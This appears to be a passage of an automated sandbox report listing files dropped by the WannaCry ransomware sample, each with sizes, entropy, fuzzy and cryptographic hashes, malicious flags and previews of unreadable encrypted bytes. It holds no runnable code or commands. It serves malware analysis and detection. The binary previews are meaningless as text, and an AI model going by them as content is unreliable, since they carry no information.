                                                                              Preview:..C.q..G... QN74...$...D.....J.....%......y_.B..u...=n...R.T.d..P.n./...e#Mp{|O...$...!.N..O.}r.-.....f..^..P~A...S..4p.........8.....$I.......-.>.A.K.9.U*.......U.D.o...M..(7-'}V.=aif.s..z...=?.=...<.AT.DPJ.xR....pJ..A....%^p.h.5..5}i../;B.......+.b....{5c...'...3v..)f.....&.....l...t.@#.A.Sx....hsv........4P.J.VQ9.X.;nt.f.1.QN...\9[H.x.4"..O.a.Q!y.&...|..T.&.j... ......2.....Y.f.%>,.e>[..e.PCm..6}7..EYU. .*a.-.i.+..*..(G|.Z.;.=....?..8.v.r..G*......(.#:...^.H..L.;.#...`..vE.+viyN....C%. .=.Mq.......UB|.7./...1......~...$.....b... jL..zVB&...A.'w.Ei.N.@....^.u...VD..9p.x|.....8...y..k..q.a...._.l..;5A...W..M.o:.*......1.20.q....{.U..._..7....:.7..pP.1 i.......*8...H......0..:.<.(..o....R...~.!6.@..%5.5b...AF..........Q~o.]M.".lph...g..U..A[...&.xl......8qD,c...yI9.\}uH.f'.j(.F.....1..X...R...:X.@.z...Z.uge..p....L'..A..n*ml.@n....i?....$.i=.>)MP.`.......(.g..W.IM..$...o.^.*.LA"..L.\Z/...W.Rn...Tv..~{{....R`..*(.....=...U..#.MW...u.c
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.818596226590152
                                                                              Encrypted:false
                                                                              SSDEEP:24:4LOkW54GlCg2Hh8DTq1LfhaWNItIDR6fWOokoFjo8ESegsAvZpFSS:Rks4Pg2BLfhkeCWOJoW8ESLDvZrSS
                                                                              MD5:C7210D95187C19ADD9AC46A483745640
                                                                              SHA1:24BC61636C3C1704E7C97F907C2C98A627D0D928
                                                                              SHA-256:BF43BD4A193DDCC6AE855E3B3A84C45EC6D879F23058CE88D49115A86DFEF4A7
                                                                              SHA-512:664C093FDE5EBEF834204AC2D35A3559FC13083E38D5C41596C72306D95D1D418BA431ECEC26E55700340682950116DF16A26BF5CBAB2D05453E2540718C7231
                                                                              Malicious:false
                                                                              Preview:.h.x......=...k...2.9.di@.J>v....X..ghuH.}.0MF.^9e~...n..s...d.....e}f8..M...y .1.E..6...oh1W.!.....%..._>..N_..U...8.l4<.u...}o..8Jr.,..:e..E5.a....L.BX..[..l..p.)h...$EM..k...q4..'1..".....M3.6l.{......A.(&.....b.......K...!.B..3D.y........}U.U.^UP."..+....bv.T..&.b.1.#.OP.'......c.7..b..a..s~.............ztr....Qk...7.O...1.*|H...e.;..;...tv' ..."?I......'..e.u..O^E...;.HbQ...F.JQ...d.."`Q.q...)..D."..WB.;J[...h..G0k/....$:..M....2........r....$.NN.D"...*gwv.a.X..S...=..Z.B.."I$k.9..~..e......F*./U.J......A...'.5..9...S.[.....&.v@Rb.|(......j....i=..(pe.-{.s.W......x. ....P..t.,..>.c..7,....P.O..Y.."..-g.(g.z.......6;c...w^.b.....w.C...O......nOS..}[U..Z0>.+.#u'v....3.zS.0['..r.ph...+..+..X.o..e..H.{..rF..........L.z.b.q...S........0N.;..v.FwdQ.....H.a....92:...2..\.Y..N./.1cL....=..$..o.S{..[mb..j......C....JF.)Zs.7i..%.dS.,..)..;.J..G...pd..C}f.{....X>7.U.c...Q..H |.;.....7 .U.*.z...fS.........: j]..%.S.L....H.-..g.4y.]{O.x...'<c
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.7759027048250555
                                                                              Encrypted:false
                                                                              SSDEEP:24:YZ503Q2G4vOvs96w6qb3v+wq5dLboEDThdTsNyds8Jir1Rj:YZodGvv033vjc9hdT0uiDj
                                                                              MD5:7816BEE329236D420E320655346ECA1B
                                                                              SHA1:FCD2A486D7EDEF53D1FFD970C5B02FB75A03A6D8
                                                                              SHA-256:DFA0372564E07F9F9FFB33C261780D98E56C71BC07BD9632730088FB13AC0741
                                                                              SHA-512:3498EBBBCDF372BD52E1805FB78B2B55F8D5526CF9BFA9B478E669765E3499BEDE0E34AEE0D1207E60AEB348D8D49D21CEED6896DCE5AC9806F0EA092421C9E3
                                                                              Malicious:false
                                                                              Preview:.c.m.v...d.......(...1....L.l..$%.Qz.k.x0o.S'.fx...u..E..-..%Hm.....H....}Wo.-&..1..Q...k'.d.3...p..e.z......"..4.rn.'%..."^x3.<..}...`.}..........8h.G.....}(..2.7|..C..'..9..y.....5..\..y.+.b.$.!..f.4.x..C.L.v.W....?.i...0.d.....2..-J...[.....O..T_(7u.b- .o.......w~.DH0...z...[4...:K...|.8....e..v....A....Od_:U7.ed..s.f.n.}.9....].......0.X.$:..........6.h...a.1.7...-.P5.ej|....$.AK-.*..o...[....N.V<.Y.I......!a..-..K......&...S.E.cN.z/..."i.}...b...-...<*ua......p..<m.$....qm..|....L...c$.v.J<..+.z.^X....e'..d.s..':hx.4%i.[..2...%4|../..1..+..O...Z...4".d...\B..6^%..L..F...s.D.h....G1..7..I.z:E....O.@9^.|.b..;.WKt2...;..q..<N..R*vMN.2...WS_..Ddg....W.,D.Ks,.-FYA....#4.!........a.Ex.z!..B..a....dz.sO.2+3.v.]...0...~n]....Y~...O..g'..L...4.<?u...{W.....m....$?g...#U:.W.......4.;...x.lZ1.I|..[.3.I..,.......e......~^>#....d.8dVu`.x..|..0........O.Z1.H5>.?.......X....F).<K^..u.:..X..X.V.K.WJE_.,w<I<Y.8.........t...T.+....e..wv..T(..|.F!
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.804978372141051
                                                                              Encrypted:false
                                                                              SSDEEP:24:xXZsbmefeQTx3VF/E3Z9Yio3bZtnYldwBRcVrr:lZsbsQhVF/EJyAlWD8f
                                                                              MD5:87A0DDBB4BDE031C8098BA31F7338C7F
                                                                              SHA1:4F251230448BEF677B894FF7B5975ABC96798F93
                                                                              SHA-256:C569E022B34E7252728E25F11934EC2997C5F7A93BDF15B3C63BD33294020688
                                                                              SHA-512:95C4ECAFBE1A0467203B26E63D1557450331CB79E95E2808A59EB91D54B83CCA977A34BBBBFAD136ACFAA78E575989D691839A54F73D0EC6426D742892F5357F
                                                                              Malicious:false
                                                                              Preview:.y.j6UH.%"L......Rab.i.)....X.r.9..-.~.n.W..q..1v?&.........;..y..7..q.l.j&&..c[.&j....o;..p%:.aY.A._'.|.ib,.Vf..H.y{....rP.........d._.....G....6l..k.W....qa|6y.6w.'..;Y.|.@..d.Z.._....zk..D.....-.;K.G..85[.L....(.k.l...$.h......R..Z...&....vJ....R...G.I...6.Y.2~.......w1........F-...tA..\U...>..&..V...X..}E........k...3....H.o....G..0..gK~*...... .`..h......uk ......N..J..m..4..B9..9S.....KV.O.v...;...[l.}.QfX.*B..X.r.8..A.....[&.5......]...P"|[z.A.............._........2s..1d\.^+.j..!.AQh5.....u.b{o.x../z....x...A`..D......VSW.VNi....M....Ka.D.O.zq2`..}.8.L..b.e....b.O.I.{.2.w...F...{..|&.G..|..h.*.]>.....Y.^..0.jDI...\..u...{=;..S..1......K..%..qF....E..gV.(./.?+.A.`.T`.....u....i'.1...Q..."..v?G.u)}.p.e..l.......R.........f.`....N)!A.I.n..\x.-..Ol...1..7.P...|Z.....G[K<\......Fm.3..?..D..h..v...B.wd...BO~.[.wO..S.;].C."....,..+2*.Ds..1U...._,.;dA...|.....a..67..Y..rw... .C....A'.......O.Caj.d.[W.B9.x.h.4,.U....].q....'V....5..=...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.775462219505603
                                                                              Encrypted:false
                                                                              SSDEEP:24:BgbPbhE2eDwoPhr5HVbuDxLK0DTSKci51BCLD83:OswGhr5HZ8Rbn1AE
                                                                              MD5:AAC67BAE778384F837E9705801D9236D
                                                                              SHA1:1C4441D0421F29B50FA796F31456DDBCE8E80257
                                                                              SHA-256:5E8584C02FFB56DBA57117CA4E4A67A46CF4ED46D80850888ED5108503615A19
                                                                              SHA-512:357C9F1F2F0C907C1B427425592F3E20AC38E71FD95BD4502E30C040D288C1F3E8944A8549275F7F0E877AE792945E8E4F237CD4A5735E128482FC6BB78992FF
                                                                              Malicious:false
                                                                              Preview:I......V:*.......H......%.b0t63......\S[..7.9:`.B..8Y.F:...p.8.".g}.]uU'e4..5.W.S.........0".k.o..q .C..pq.HW...m.~..yp..y|...d..g).3OW.A.P.........z4m.*X,....u..+.&../...Ub].#F.z.g.. .....[v......s]9.`....4l]. ..}2....LF.PeI..i9D....:.T....#..I.<r.S......%..a><.2...K....B....f...`.*.z.:.~.n|/..;.<`-..G.O.k..y|.U.'......vVV.....o..|...v.B.....07...o...M...8./9@..\...W.1] =.....8..e.. rI..U..|.g.jd.=./..A..........%.}9.Rb`A..5...-N=..........a.c/h....x;..........'.U=zaQA.........,QT.1{>...D.[z=......9.lr...;.g8]F.t/.=>..Fy..)!DR..=7..oH..eS..^.u..........J.Z+..6Yq...@..w.X...+V.2....EV-...T..Op..IX........t.......y.J..I0 ...T3....0...(.X`.|cV..b..."1.#.....|.Ka......)*...u3B.......Og1..*.b."3...?'.A.3.4l..+_{..e..`......i...R..&....O...2g..W.(..e.:.;Q.kg5..`.I.....{_.0.....U9....[....$.?....v.<..<T..1.H...8.b...W?Fa.';.e..[......;...Q..a.....Ov......d.x.1LAx...ko..d...b...`.....@....D....T..,6=2#B..O.p.._.SW.qo....?..8R.g.x0/*.@.&.x.J......@.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.820801471327097
                                                                              Encrypted:false
                                                                              SSDEEP:24:ix1ilSyCY2RFN+v2OpB90wsKVioa/Ni/+KtR5TA/MttAd:UvTY2RmVpkKVM/Ni/fR5TAkvM
                                                                              MD5:18948520F5DE8830D919332324CB9080
                                                                              SHA1:215FE9BB1217C20E22B175A9953FE42A1F161754
                                                                              SHA-256:1DE8F6D00D635FA1A7263910B348C18B75AB92EDE43F04D6F0D0FBCD3D2B529A
                                                                              SHA-512:E1FDEB4B6CD434A3DCB5FD2A73E34F8F379456D0921791928D75A1F5492060A863C6D41AD61F0DC3CEB3D0B446BCA8AD85E909981DED65D6910C1C8C29EEA06F
                                                                              Malicious:false
                                                                              Preview:1=..~.......}n...=.....-..v*...Q...9K=G.]..E..n..!?......nW....M."...Q*..<......U.>9..."..1..n..).z..n.....q&t...%..?....*.....il....V..6....P..0....(.|..e3].H-q.*.W.*%.-:..h..'..]....,.....(a....{t....I...Li..rw..pFu._#~u....*.@c.1.|bX..J{..a.z....3......y+...:.1_.p.....Y...).W..@.9.3...,.&..\.9.w{o..$@.).t.8.w=...".m.3...f./...T.......i.I..^.?...s..4m..D...Z^#.Gr.c...h...t*.+6. 7.......ti..,...6...O#5..*.3.U..|........8X...\I.....`..\..YJc#.B.<,.v.e.x.%.f.../......{7..1..b.~...=..>.....h....HjF....v.3J0...t..U%.i.e.fV.;...c...^;.[.cBX.y.?g.4K.z..s.....X..FCC......DLE...8.....A...fp.0R.<..........?aW.c?.....X.:w..ei.Pb.P9\fyC[O.,.....,Tfx..A.=!...vl..x.{.3P2....d0...p...V.....w.0.D.#cva._...@..).mxZ.....l..p....opy....<8F ]..JE....,7...L.Z.........L..e.X.T.t...}.H.0.D...u..~YAiv...3.O..A.c.S7.F.yD,..9.]O.._.w..8/^....B.....;j.T.~....1..OfL.d.F+O..@..Z\..s...9i..+.~b.]......q.e...c..... ....s2V..l..5.].>...[.....=.H.....<.o.w.i....@.a.(..>7
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.789997774915101
                                                                              Encrypted:false
                                                                              SSDEEP:24:LYFlaNiiq9XKMSm9/vtIF0J0YOD6ZBpe9zf+iW3cXxtXx:L5NcZX/9iYE6ZBoDPAcXLx
                                                                              MD5:DB2B3FB1C097B72A20EDFF17F9D50945
                                                                              SHA1:FAAFE97B631058D73B38E582DD39B4C461518354
                                                                              SHA-256:EE1CC5388423A9F51C7C9D7BCF2CB2265D0ECE1BBAC82A8EF4E8F96A9958A5D2
                                                                              SHA-512:6ACD19C6982260A0F4E5CF6A950A7CA897110BD35222E04DC87CF658CE7C1AC3F9C5D3C94B95C87A2226D60DCBA8413D1A1E2EB49556176762FD53FAE750EB3F
                                                                              Malicious:false
                                                                              Preview:.g.@.Y.I.{K[.i.J.I.$.b24.qQ!;.?A.'l........t...q.......hb...F.`k...-N.2.&.cU/..... .t.p?.".?.TM..+T*.QB.........)4.(m.D....QjL..F.Vw.-......KO..B*e$d.1..........%.J5.2.u^..ZV..v[..Jm;W...X....hM..b.-.~....i3..@.DW...D.$}=[6..G.....[.H."N.........|'...Lx..}...... ..F..~.o{I..... e.,..!\px....s.'.H\(...<T..7:...V...".......H..W....[..$.Z..,......>M.Y.n..{'/.}...w#'..~.)..j..$.qq...T.{.,..%2...xoo....*."Xc..%).].3...7.\.Q.....p....8.U.(......5.*..'..(..QnA..)T...........#..E.v.{..J!.\..(3/...:[...\I..0..9P.P<.q.f!...*Vu..R...n.}.....]e....!...,tt......7..V...r.m.z..3.IW...w...}....+.zY{M m._.5..O..8..h.D....hly..#..LUwH|>TB*..w...[-K..G.....a.4..$.P(.-.a.KY..kW*I.(...(.6aRO^z.^.....ugP.!...7_..w.......Mh..b..`....{H'?.b....p.K.o.G.+...d..X.....f8..$......."..&)R!.......R"g)...7O.......wtC..@X+..^+Z.:]J+,...I.G...c~"..x...q8N..+....w...&)...*.o...'dP.4'...._..W....}|y.d..',../Z3e.m.$.{IG.6....l.......5.G{W.b.i..4....(............q..!$.p|....S.;.J..{
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.801530169081064
                                                                              Encrypted:false
                                                                              SSDEEP:24:n8L2BlCcgN2qQL0FcZ6lEJ2Tf/vGjz85ryQnLyotszCqj2jZ:n8cCdNQecZ664f/ejz8vnLyAJjZ
                                                                              MD5:8CE0FB4591C3F5231BD04BEB7AC60439
                                                                              SHA1:B3E2B91F33F944AB57EB6B0E7BA670F602DB4CB2
                                                                              SHA-256:4832F9777F775F19E53DE83FC7C4F6B58EB20271972056C9F2474299B7C6EA79
                                                                              SHA-512:7CF51567A0E14F471358FF8F4B04C0093F2123B2FD536517518692BB71492E408CE05C917F40E904A68A6284A0E5568D775B349FED09EF0318D2C2702FD0056E
                                                                              Malicious:false
                                                                              Preview:$.......0..W:J?s..s...F..r.r3....Lg.8.^.+J..bJn..j@@..{..&...<i...j...$I^.....^.L.~6..[.A.....t'....Mm...f~j.J^.x...~.f ...F[.....V.Jz..TX^.W.v/v.. .....Fu..H..t}.v/.X..\'.I...c.*P......Ma..3(.G..jS....x.,|s.d...>....e..r....6lD.}..h..l.&.?h.-....ik.;..^.P.'. ...Y_t_k.....&.b................e[.I.2.u..o...i.mk....ev.O}.q.u..4.M..%h../s|9Me.....z<0..f . ...Q/..s...|.?{...n"vL./:u.....rY.....r..z..s.d]....w.2..d......Z....?..o..H.....8.......I..9.{.........i.."B.x.P..|;.."hC..c....].&vE)..........."..$)t......G.g..U......j.;...0p1.11G:.%.xQP.h.9..........a....$..`..k.*..1D/l..)....r....8.......Q<"...nP~.,...:.gN..-..".N...4..6'.\.|..<e...(<..ro._:J9...=...j.%(..OA.h..6...[...VH.9..7.l.t..N..u....{.....iC0.An*}.li....\...i..^3.?..<...H{.....J..?I....b....7..b.Bbg....)?.#._....9R.>.'.\.T.7.k7LF"h}*...9J.Y'...C.jP~.L2D.....b......;...8@D#.}..-.[...-$.C.|.R'b..<!..5..5.o......E.z..u..9%.oXMH..:jNap."Hq....<..LgV7.om(..pU.&...T....K...~
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.815012852581599
                                                                              Encrypted:false
                                                                              SSDEEP:24:xLZi+9sg3jPQ10lWTYIJ9Cc2s1PaBOAR/rRt95NM:xL59R37WTY4N2spacARDRttM
                                                                              MD5:8CDB909AC00ABE51F04F2292069CD563
                                                                              SHA1:6E89B165A7240D30187A839E2430A2E64232BD57
                                                                              SHA-256:202CBE380A4D4312CD3D4F2CEA56FF0715C849C1AAFAF5664B44AC464D66F959
                                                                              SHA-512:1A8268C61E32F022EA427BE01CCB50291863938DAB3951D8B69D2FDBC41ED88663CCE88AC9567FCC27ED8E16853496199A4E4A0234DE46ACBDBE39048E370571
                                                                              Malicious:false
                                                                              Preview:....'..sH..QG~.._...|T...9.=...}.E..D`G+.#......}sV..8..BX1..6bN....."6m>.O.gJ/..........[D...pT:.@..8......t.b.y.Ke..t.o&.R....U...C........Oo"..4y.Xq..#..j...~N...UJ....DAt./.T@.9...)..3.M..............R~M9 *^.,V......K....TD.....".E.J!..`.a.,.hy=..V....K..h....X....e...#...r.-..dHQ.uB..T..j.*Gd./{/..n..U.G.....J...,-.0.4..83!>..0...we..hJ..h.TT,s..,lm.)+.].?%(IB&Q.X>....U.....H..|}...H`.....+.6!......7\....R..>o[...6K)..........![.:s}g.Ip...... #..(q....k..V....3.n/.......i...C...%.Y.......%...<..S...&..@.N....}B.t..A.W2Q....5.Zx%\..\`J.t37HQ........[Z...*>.."..eS.e .V..?.&\..G9G.?a+......6.a.....B....I.,..7...b....->..B...N.:..?..H..1....[..t...XD.|...F...jn...O.X....$r.....Om.i.$x.,(..&...U].H.....3..U..C..fe5q.(..p+}!..6.^..............*...S.8...op^G..Xq..I......I@.].<..r..A..{..5.<.....+.. .h.w.I.R.[;...T.-.....Bi......*.`..;...#.ev....="..em.O.(.&.!_.U.!..].......7O|.w}t.l8...]|f..X..+.Jh.gu.3...s...z.G...`y.a..S].7..P
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.801076213827644
                                                                              Encrypted:false
                                                                              SSDEEP:24:yNd0M3y2dJUUAnqDuqGULXunIevWMC3DrIFmQ6P:yNdFdJmqaTnIC8T0F1o
                                                                              MD5:E266080CA876FEF58DE7DDC1FD40E4E9
                                                                              SHA1:4D37D4591360D083E4D5B862A166C03C6F735801
                                                                              SHA-256:A95FD3C94BD305D0C977BAE7CD865DCDE5D1FD403C2AE9477F8F162EAED8924A
                                                                              SHA-512:80D8ADCDD3DABF3D050722417C533E2E5467FC74DD4E9732EE0D24075CF19B49109C843F882A19AA8CCF92BB24013453FF66B4D025B84B29AA4738ACBF925F23
                                                                              Malicious:false
                                                                              Preview:..J?...)1.....[................c..p(....V..v.......@b.1 Aj....c.....yw..*z...{X....al.?...s.wg.J...}a...<...x.......8<.[A.A..5.~.......>........Q<.|.;.2...".]J.h.&..f-..}.. .Q.0........G.7'.*./.....,..j......42-....p[...m~*W.}a...DLU^..?......B.#.f`......{.jw>M..>..r....p[..........$.P../........7C......../P...$<.m3..{..,.0w3.....wk.m...7..K....... u.IeF.:...x....".u2p|Sg....`G\."|.`.s..U..W....W[P.M.K...eO+..m<....k....Iz..R..k...u.....G..&.h[%.Q2..:.r/3.R....eA.....0....=.f.)B..E<..8.>.c....z...?F|.[.K_..j).=..hf.s&<....p3f.H..V...OL...../...Dn%.Np.^pC.."..>.O.c.....!.'.P;...U.|....W...F.&..R.#.t..!i.{FC.h .1..C....l...$i..2.^.O..?..~8.+.^E.[.....G.....[..Y.xO..x./"e.l...K}..ak.......r....g.....}.E.Ps1V....XW.c8..G,F.......i{...y.#0.O.R.9...U...>.ml.....X&.|..iN-....4.t....vp.....m.2L7..$.......';.,...I'.v(.#..?....gW.-.*_V.!.x..m...*..c8...../.I.$.P_T,Ax.3pr...tP_.@I.H.~...tbZ-.I.xV.p-.Ru.i.....DX..].?s...x....}..S...y>...?_....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):271360
                                                                              Entropy (8bit):7.999322858109388
                                                                              Encrypted:true
                                                                              SSDEEP:6144:VBtANyAhkEmDp1GfhfKICr5efqBfVnCwg3nB8:zAhfZhfKjrUqNppgi
                                                                              MD5:2E71044D7EB3B297544424C23F0C2B6C
                                                                              SHA1:F4E06CF76F6B15B3C0DD417FFAA713AAF3C27707
                                                                              SHA-256:FE0902B991203755585C603283E7DF7BEA06B55C182FD2F6297B4736914F2424
                                                                              SHA-512:409FE6A3B1EA2AD6DCE7C820682B18C08F4FED169D7C5EAB365E17F6AD8BCA225BD57E6649003BDDCC6D7BC3419D10D716EAF9B82151EDA07A7343FC5F582138
                                                                              Malicious:true
                                                                              Preview:.B..E.H.G.5......>..Y..gY..P.n*9..%m..7......)..^.?.$(...Z;g$....A...b].9.V.....?......je.Ji...>l..@..0.R.....5v...?...(..rh....=nk.....r..)...?....q........q.....1..f...........p..D..W..h2...D...9....X3...+.w7..S....[.H.A.G6Kg.....:...y...e..#..._.U..^N.&...ss..<y.o.c..N`..$..y.4.6... ....K...>Y...[..j.O..Y.f...|.9.[B!..=.Z}..p......../..d.M.j....L....N!JJ...*..1...z Z......7...%..$...k..8.....O..O.^.g-...1.?.#..:S.0.....>...^...F._...\M.... ........H.....eE.Y.N..~Q.m...C.-.Mj)..#...f.I....zk......#.....p......C..?.7.n.-...Z.G.$n....R.+..J....m...b'U._.Im&.j.[..k4h.G... w}.f:..r...n....LB:..9T.........$xn0)...../.8.f}........M..L.x.`.Y3..dJ.md....[.f.F..)(.M...G...{.|..o..2O4.'..w...Y..Wk.3....C.A...k.~Vv.d..<...qH....~...B...|sVldkj7...T.$!...f.G..L'7.li$......n/.x..V.ss...-......C......w.g..:...4'.xsc.#d..\.h.s42.-.k...u.@6.e........?v%....K*Do.j.t.0FeyQsH4Pl.T.7&.....T...or{s...[b..L.N=...Z .kW...9.#)..I.&....8.:1.[..x.....?.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.805365413585998
                                                                              Encrypted:false
                                                                              SSDEEP:24:zx+QkfYScRFrfFvUJcdcmIlLklFasVVSuVV+X8:z8Qkfvc398JkhaszVss
                                                                              MD5:D79FA02A7AE9CF968353E098D72D8FEF
                                                                              SHA1:3F9975A9D692E112A6ABA1D5AEE51FB202719A45
                                                                              SHA-256:BC5FC9886D54D9FA119428F9DAA2F7ADD3A8BC1DA8C50B026D81D73AD020FCFA
                                                                              SHA-512:6C546F3759C3905500394F2259113B66C69F5C34D801308BBF999A94615532CD456D2DCF69AAEF104B4C98F031C4D10F476647519D0FEA44F2B6A5E26920C9D0
                                                                              Malicious:false
                                                                              Preview:.F.2..U\.[.."......:fC..C.z...~].%5b.....6N....i.!..B"...w=.c..h..Y....)N....$...|.)..xu.j...%.O.;.........#.D....g.'.A..9.....P..]_.....-h]{X_W..........G...-....=.W.A./Qm7.h. j.....z..ie......_.I...H.....G....F.~-:.X..Xc..O..T.e..]z.j..R..\.-........e{8...X-M......;...{j.7.1nb|v..........8......h.S.......G)5.:6..Ko.....o!?..c...Trvp..n.z.Jz.Qn..o3%.A.."W.+=}.6..i.......w..:..Q\...x...S..?.U..)%`.f!.w..-...-xuf.V...N.4..0..8k...q...1.5........uv......|<_.11.1.OtS.}.......6.w$#5t..U..;g..:1.<]-.S.y.)n...}.tJ.R!.g..A...p...F.R...B.KN...84>e.V...z...AQg1.c.no....9j...].....d...j.R.Ut+C../..b..N.E.r=(..xo...&.$..=x../.$..z..f....}....bH...W}..W`u..h.O..4-q..10.O.@..!.%dU.a>C%n...).......).BU..Mn.x...=....QM..+..)^...U...t~].{r-..8..OF.1..],uc.u.d.F.....Q6.R.xS...\.;.i2..+#....s|....W.I.[m6@6..y.Wt...Wb..!.s....rP...<\...6r.&M..p..0.x....".gF.m....b... .!.%..CIU.}M._7..y.'.8/.D..M.Hi..y...#....._....J...Q.YA<......D..".y....z.E...:'w...Z..$.X
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.821421613274847
                                                                              Encrypted:false
                                                                              SSDEEP:24:ma3z+07rmp8rtxcEZ0lWPGo8is9ZgR5g1qSrocjznspxy:Nj+urjzcEZY6/8BZgo1boc/spxy
                                                                              MD5:034C89831E8DB4F08DFB72280B16E46E
                                                                              SHA1:2704A8085C146BB2AABAE5EFF5116738B1FF8180
                                                                              SHA-256:01CD06A15C0046DBA2795057DE893B2F1F9FEF6D349768BE89404720605317C0
                                                                              SHA-512:5109F151D799B51E70084C410DC897FA9AF1BA0B148ACFA6970F9D30B9594EE2816928A2E9CD80DC2489E612EFFC8F6444F43719234B22579BBE4D770CF49D5B
                                                                              Malicious:false
                                                                              Preview:.-.^......M..@..#..4].....R......_v...:...]9..|..@..[...\....(z$.....[..w..*......4_.0S....r.H.#c.W...^]!......k..P.u.KJE#.$..y.}..9.D.uv._.Qp..L.%O.,.8N...O..J....b..r.f.>....C[.<.WQ&J..M...L1.....'.v..I.n..*..X>g"xff6..;W..j...D.|./..Y:../P"...C.......-F...|%..b..[.....z~."...7..r#.Q1PY.9.p..zxu.X.1..>Y.;.0..>.-.6..K.-.......U.........W..*xbe......a..K.....Z.T.K..Cw...Q..N....%B:w.....c..N(...`..yE...2.{.$.&.n...T/5...fM]....6....$:.O>....U.#'....f.?....BF9.G.O.,.gR.5...NBL..f...X....!1..d...s|c.....5.D.@X...+..v..)Q.9........r.6.........?|..=.L.ff...*d..:y.a..C....#`.?.@L?'....;..c[..m.;..w...$k.3\.%....'.+..X.W....K.?G......\..$...vA...mr3\.2F.}. ....>....{.`.H.>.o.VQ..6.3......_..O..K.....E&].UyF.....f.Q..g.."..y..`.N....?..'...x.c.#h.'..xB.i..8..:..!o..n..r..w.+[<...kL.)........e..R...qC&..L..o...._..T...'.]..v...v.E...O.g.E.L.3.$..7..^Q.2F..O*)6.P._.,bd...q.pWv.b ..m..x.F">..D....G]..~ . ...6.jl..9..M ...4....JX%........OS_.k.^..3C3
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.8126474718219665
                                                                              Encrypted:false
                                                                              SSDEEP:24:2Ri/Skm0WoMN5POPbU3Ggg7OQQKjcFMODNFO9gb5Gn4Y:2avN5MNFOPsGggq31MsN0SK
                                                                              MD5:D900E6DE12FD6549CB74D804EA57C90E
                                                                              SHA1:0354450C4CA20EA8BFB008791D4E4B89AC56CA06
                                                                              SHA-256:CE4ED7F42FE2ED81DFF57B8997948B56A299C1E89FE1F45A098A86E4191CC633
                                                                              SHA-512:80295BE586CB6E31E6B3EBF6A6B66C9CE244730C3A6068F09356FCC89C295FD30E5B3023C9AAD62FFC15AA11C3DB9A6067E61DAA61CFC6F8E1AB702BFF2080E4
                                                                              Malicious:false
                                                                              Preview:.-...,...j.....G".Q9..S..-.g:+w../...u.D.E{...7..B...b@.eXZ.}..d.bpMMBn. ...3....8.c3..kr..B.jU.\.z}O..9Y......c.&g.4..<myy.~n.......9g.g.....B..]..6C.u.v..1:brj11.w)]96.^.s...].Iy.6=Tj.1....T....K...x.....C..@.,tO....m.....<.V..d2)*+D{.].r.y-...v.,q.......\._.t..,.`.h7.E.u...2..=0.e....b_.....y&NJ6..W..y..n...v.D.......5N...[...).....4F.a=.7.cNs&j..p...=U.....*8.....+...G..&.5...t+.,c.B;.C..J..w...2..8.......A.Q. E..Qu...W..t.{f..K..%R..$..'...s.........[..i.r.O..-m1.....~'.C...TZ.4..9..0H.....G.'..W.X...%.]b..w...n..}.9..x.%.T.K..........Xm....qi/3.]...0sNJ.....;.F..Z=..L\..;D./K..%..gyw.K.#..F...E..I...r.N&F'.Q`.f.........b{N..i..(.PUc..Z\...........h2]J......H...k..4E| .N.'. .^V'..fc..B..@9g...J....b....m...m......AX$....F.....lzr...~..s.^P..B....W_..pN.X.WpD..1.0.1~..B...;KV.m.nB..k..h<.q..6...<..Gp.m..=...O..L..T.....B.V.r*.[.`:....m.:...V.^... ,..?.....=....O|1..J..."..P..Q...P.om5..Y8Np9v=..x<....G.&..x.(]...-*."......?...D.[H..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.7788343210315
                                                                              Encrypted:false
                                                                              SSDEEP:24:sL0DJyEYNO3rkGHiN7HC+HO2eSf7piNh622W5tl8zdcWWbMLW7ualTt:sYJy1N6Xq7H9u6faIWHiCbL7/lZ
                                                                              MD5:69D27AA86CF0DEBED4A6663D8C67F267
                                                                              SHA1:0BD4EAFCF9B48EAEF1A87FBA6DB051835D5DF35E
                                                                              SHA-256:D11BAEBB8FCC94D98F51AA27E8174F16B923F1F1896975276B8CF269103BB33E
                                                                              SHA-512:75DFCF12B570902086003E91161C208FD9CFFA747FE7CB48A2C0F91E7DD33287A8364560D684F3354C037B4FE9A3148F9E13C355965D734EF6237F7D224622BF
                                                                              Malicious:false
